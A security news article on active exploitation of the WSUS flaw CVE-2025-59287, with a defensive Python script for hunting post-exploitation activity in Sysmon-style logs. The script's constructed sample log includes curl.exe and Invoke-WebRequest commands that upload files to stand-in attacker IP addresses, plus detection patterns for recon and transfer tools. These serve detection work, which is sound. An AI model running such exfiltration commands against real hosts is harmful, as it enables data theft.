Microsoft Refuses to Mark Critical WSUS Flaw as Actively Exploited
Cyberthreat analysts are reporting active exploitation of a critical vulnerability in Windows Server Update Services (WSUS), identified as CVE-2025-59287. Merely days after Microsoft released an emergency patch and CISA added the flaw to its Known Exploited Vulnerabilities (KEV) catalog, researchers have already observed large-scale attacks leveraging it.
Despite mounting evidence of actual compromises, Microsoft has yet to update the advisory status for CVE-2025-59287, which still lists the flaw as not under active exploitation. The company merely describes the likelihood of attacks as “more likely,” even as multiple independent sources confirm that exploitation is already in full swing.
The Google Threat Intelligence Group (GTIG) has verified that the vulnerability is being exploited in an ongoing campaign attributed to a new threat actor tracked as UNC6512. Upon gaining access, the attackers execute reconnaissance commands to survey affected systems and infrastructure, subsequently exfiltrating data from compromised servers.
The vulnerability affects Windows Server 2012 through 2025 and stems from unsafe deserialization of untrusted data, allowing for arbitrary code execution without authentication. Systems where the WSUS role is not enabled remain unaffected.
The first patch addressing the issue was released on October 8 as part of Microsoft’s regular update cycle, but it proved incomplete. A week later, Microsoft issued an out-of-band fix, yet a surge of attacks followed almost immediately. According to Trend Micro, over 100,000 exploitation attempts have been recorded in the past week. The Zero Day Initiative (ZDI) reports that nearly 500,000 WSUS servers remain exposed online, with attackers targeting vulnerable instances indiscriminately across industries and regions.
Researchers at Unit 42 observed that the attacks primarily target publicly accessible WSUS servers using default ports 8530 (HTTP) and 8531 (HTTPS). Once inside, adversaries deploy PowerShell commands for network reconnaissance — including whoami, net user /domain, and ipconfig /all — before exfiltrating data via Invoke-WebRequest or curl.exe to remote servers.
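The reconnaissance-then-exfiltration pattern above is something defenders can hunt for in process-creation telemetry. The following Python script is an added example written for this article, not code from Unit 42, Microsoft or any other party named here. It reads Sysmon Event ID 1-style records (one JSON object per line), flags shells or transfer tools spawned by a WSUS-hosting process, and reports which of the reported indicators (whoami, net user /domain, ipconfig /all, Invoke-WebRequest, curl.exe) appear in the command line. The parent-process names (the IIS worker w3wp.exe and WsusService.exe) are an assumption about how WSUS is hosted and are not stated in the article; the log lines are constructed for the example.

```python
"""Hunt for WSUS post-exploitation activity in process-creation logs.

Input format: Sysmon Event ID 1-style JSON records, one per line, with the
fields UtcTime, ParentImage, Image and CommandLine.  The sample log at the
bottom is CONSTRUCTED for this example and does not come from a real incident.
"""
import json
import re

# ASSUMPTION: processes that host WSUS.  Not taken from the article; tune
# to your environment (e.g. restrict w3wp.exe to the WsusPool app pool).
WSUS_PARENTS = {"w3wp.exe", "wsusservice.exe"}

# Shells the reported activity launches from the WSUS process.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Indicators reported in the article: reconnaissance commands ...
RECON_PATTERNS = [
    re.compile(r"\bwhoami\b", re.I),
    re.compile(r"\bnet\s+user\s+/domain\b", re.I),
    re.compile(r"\bipconfig\s+/all\b", re.I),
]
# ... and the tools used to move data off the host.
EXFIL_PATTERNS = [
    re.compile(r"\bInvoke-WebRequest\b", re.I),
    re.compile(r"\bcurl(\.exe)?\b", re.I),
]


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the reasons this event matches the WSUS post-exploitation pattern.

    An empty list means no alert.  Recon commands alone are not enough: admins
    run them from interactive shells all day, so the WSUS parent is required.
    """
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")

    if parent not in WSUS_PARENTS:
        return []

    reasons = []
    if image in SHELLS:
        reasons.append(f"shell {image} spawned by WSUS process {parent}")
    if any(p.search(cmd) for p in RECON_PATTERNS):
        reasons.append("reconnaissance command in command line")
    if image == "curl.exe" or any(p.search(cmd) for p in EXFIL_PATTERNS):
        reasons.append("outbound transfer tool in command line")
    return reasons


def hunt(lines):
    """Scan JSON log lines; return (time, image, reasons) for each suspicious event."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        reasons = classify(event)
        if reasons:
            hits.append((event["UtcTime"], basename(event["Image"]), reasons))
    return hits


# CONSTRUCTED sample telemetry: two WSUS-spawned events, one benign admin
# command, and one exfiltration attempt via Invoke-WebRequest.
SAMPLE_LOG = r"""
{"UtcTime": "2025-10-24 03:12:01", "ParentImage": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -c \"whoami; net user /domain; ipconfig /all\""}
{"UtcTime": "2025-10-24 03:12:09", "ParentImage": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "Image": "C:\\Windows\\System32\\curl.exe", "CommandLine": "curl.exe -X POST -d @out.txt http://203.0.113.10/u"}
{"UtcTime": "2025-10-24 03:15:44", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c ipconfig /all"}
{"UtcTime": "2025-10-24 03:20:00", "ParentImage": "C:\\Program Files\\Update Services\\Service\\WsusService.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -c \"Invoke-WebRequest -Uri http://198.51.100.7/x -Method Post -InFile C:\\Temp\\data.zip\""}
"""

if __name__ == "__main__":
    for when, image, reasons in hunt(SAMPLE_LOG.splitlines()):
        print(when, image, "; ".join(reasons))
```

The parent-process filter is the part to tune: on a real WSUS server you would narrow w3wp.exe to the WsusPool application pool and add whatever other hosting process your deployment uses, otherwise the rule degrades into an alert on every administrator who types ipconfig /all.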
While Unit 42 notes that current activity remains limited to reconnaissance, the potential consequences are severe: a compromised WSUS instance could be weaponized to distribute malware through legitimate update channels across an organization’s entire infrastructure. Given the low complexity of exploitation and the availability of a public proof-of-concept (PoC) since October 21, the vulnerability poses an imminent risk of mass attacks.
Several experts have also pointed out that Microsoft’s recurring issues with incomplete patches have once again come to light. The ZDI noted that similar cases had occurred with SharePoint, urging Microsoft to improve the quality and completeness of its fixes, as partial patches can create a false sense of security among enterprise customers.